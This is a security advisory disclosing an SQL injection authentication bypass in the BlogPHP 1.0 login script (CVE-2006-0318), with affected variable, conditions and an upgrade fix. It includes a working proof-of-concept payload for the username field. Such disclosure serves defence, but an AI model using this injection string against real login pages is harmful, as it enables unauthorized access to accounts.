Authentication Bypass in BlogPHP
Summary
- Vulnerability
- Authentication Bypass in BlogPHP
- Discovered
- 2006.01.15
- Last Update
- 2006.04.14 Solution added
- ID
- EV0034
- CVE
- CVE-2006-0318
- Risk Level
- medium
- Type
- SQL Injection
- Status
- Unpatched
- Vendor
- n/a
- Vulnerable Software
- BlogPHP (http://www.blogphp.net/)
- Version
- 1.0
- PoC/Exploit
- Available
- Solution
- Available
- Discovered by
- Aliaksandr Hartsuyeu (eVuln.com)
Description
SQL Injection found in BlogPHP (http://www.blogphp.net/) script.
Vulnerable scripts:
index.php
Variable $_POST[username] isn't properly sanitized before being used in a SQL query.
Condition: magic_quotes_gpc = off
PoC/Exploit
Link:
http://host/index.php?act=login
username: a' or 1/*
password: anypassword
Solution.
To fix this problem install or upgrade to 2.0 version.
http://www.blogphp.net/ (http://www.blogphp.net/)